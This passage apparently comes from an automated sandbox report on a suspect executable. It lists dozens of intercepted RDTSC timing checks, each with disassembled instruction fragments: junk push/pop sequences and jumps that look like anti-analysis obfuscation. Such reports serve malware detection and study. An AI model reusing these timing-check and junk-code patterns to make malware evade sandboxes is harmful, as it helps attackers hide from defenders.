0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B8298C second address: B829C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74670h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FFB28B74678h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFDF73 second address: BFDF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFDF7B second address: BFDF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFE56A second address: BFE589 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFB28DE2A08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FFB28DE2A18h 0x00000012 push ebx 0x00000013 jmp 00007FFB28DE2A0Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFEEAC second address: BFEEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFEEB2 second address: BFEEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFEEB8 second address: BFEEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BFF049 second address: BFF04E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C01D94 second address: C01DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C01DB2 second address: C01DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFB28DE2A0Ch 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C01DC8 second address: C01DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 je 00007FFB28B74666h 0x0000000c jbe 00007FFB28B74666h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B87A29 second address: B87A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FFB28DE2A06h 0x0000000d je 00007FFB28DE2A06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B87A3C second address: B87A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B87A42 second address: B87A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A61 second address: C05A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A65 second address: C05A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A69 second address: C05A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FFB28B74674h 0x00000011 pop ebx 0x00000012 jmp 00007FFB28B7466Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C05A97 second address: C05AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9511F second address: B9512E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FFB28B74666h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1B4 second address: C0B1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A16h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1CF second address: C0B1D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1D7 second address: C0B1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A0Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0B1EC second address: C0B1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A6DD second address: C0A6E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A96B second address: C0A96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A96F second address: C0A989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FFB28DE2A12h 0x0000000e jc 00007FFB28DE2A06h 0x00000014 jc 00007FFB28DE2A06h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0A989 second address: C0A98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0AB0C second address: C0AB31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ah 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFB28DE2A0Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0AB31 second address: C0AB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0AB37 second address: C0AB3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0ACAC second address: C0ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0ACB0 second address: C0ACB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0C7E9 second address: C0C81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FFB28B74666h 0x0000000a jmp 00007FFB28B74676h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFB28B7466Ch 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0C81A second address: C0C826 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB28DE2A06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C0C826 second address: C0C84C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FFB28B74666h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFB28B74677h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD7109 second address: BD7110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD7110 second address: BD7158 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFB28B7466Ch 0x00000008 js 00007FFB28B74666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 07A7A061h 0x00000017 mov dword ptr [ebp+12A32508h], ecx 0x0000001d call 00007FFB28B74675h 0x00000022 add dword ptr [ebp+12A358C0h], esi 0x00000028 pop edi 0x00000029 push 49617F84h 0x0000002e push eax 0x0000002f push edx 0x00000030 je 00007FFB28B74668h 0x00000036 push edx 0x00000037 pop edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD78B8 second address: BD78EA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28DE2A0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 4B9CA800h 0x00000010 push 0000001Eh 0x00000012 mov dword ptr [ebp+12A31DB6h], ebx 0x00000018 nop 0x00000019 jl 00007FFB28DE2A0Eh 0x0000001f ja 00007FFB28DE2A08h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push ecx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD7C38 second address: BD7C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007FFB28B7467Ah 0x00000012 push edx 0x00000013 jmp 00007FFB28B74672h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jbe 00007FFB28B74668h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C10039 second address: C10058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A12h 0x00000007 pushad 0x00000008 jnc 00007FFB28DE2A06h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C10439 second address: C1043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C16A5A second address: C16A60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15564 second address: C15576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FFB28B74666h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15851 second address: C15856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15856 second address: C1586A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Eh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C159D8 second address: C159DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C159DC second address: C159E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C159E2 second address: C15A0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FFB28DE2A06h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007FFB28DE2A19h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15B52 second address: C15B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74670h 0x00000009 jmp 00007FFB28B74673h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C15B79 second address: C15B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FFB28DE2A06h 0x00000011 jmp 00007FFB28DE2A0Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C16145 second address: C16186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFB28B7467Ah 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jne 00007FFB28B74666h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d js 00007FFB28B74666h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C16186 second address: C161A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A17h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1644C second address: C16478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jns 00007FFB28B7467Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jg 00007FFB28B74666h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C16478 second address: C16488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C168BB second address: C168F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFB28B74670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FFB28B74673h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007FFB28B74666h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C168F0 second address: C168F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C168F4 second address: C168FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C168FA second address: C16924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A10h 0x0000000d jmp 00007FFB28DE2A12h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1A2AC second address: C1A2B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1A2B2 second address: C1A2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A11h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1A2C9 second address: C1A2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1A2CD second address: C1A2D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1C689 second address: C1C68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1C68E second address: C1C6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFB28DE2A0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1C6AF second address: C1C6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1EF07 second address: C1EF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1F06E second address: C1F0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jnc 00007FFB28B7466Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FFB28B74685h 0x00000016 jmp 00007FFB28B74679h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1F0A3 second address: C1F0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1F1FE second address: C1F231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007FFB28B74666h 0x0000000c pop eax 0x0000000d je 00007FFB28B7466Eh 0x00000013 jnl 00007FFB28B74666h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d jmp 00007FFB28B74670h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C1F231 second address: C1F235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C28577 second address: C2857F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2857F second address: C28583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C28583 second address: C28587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C26EBF second address: C26ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C271BF second address: C271CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FFB28B74666h 0x0000000a jo 00007FFB28B74666h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C27352 second address: C27368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28DE2A10h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD76B6 second address: BD76BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD76BA second address: BD76C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFB28DE2A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD76C4 second address: BD774F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add cx, 6FD1h 0x00000011 mov ebx, dword ptr [ebp+12BE9762h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FFB28B74668h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 and edi, dword ptr [ebp+12A31BE7h] 0x00000037 add eax, ebx 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FFB28B74668h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push eax 0x00000054 pushad 0x00000055 jmp 00007FFB28B7466Dh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD774F second address: BD77D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FFB28DE2A08h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov dword ptr [ebp+12A3365Fh], edx 0x00000029 push 00000004h 0x0000002b mov edi, dword ptr [ebp+12A32D5Dh] 0x00000031 sub dh, 00000053h 0x00000034 nop 0x00000035 pushad 0x00000036 pushad 0x00000037 jmp 00007FFB28DE2A15h 0x0000003c jmp 00007FFB28DE2A0Ch 0x00000041 popad 0x00000042 jmp 00007FFB28DE2A16h 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b jno 00007FFB28DE2A06h 0x00000051 push edx 0x00000052 pop edx 0x00000053 popad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BD77D2 second address: BD77D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C27733 second address: C27739 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C278CC second address: C278D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2C442 second address: C2C44E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BA30 second address: C2BA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
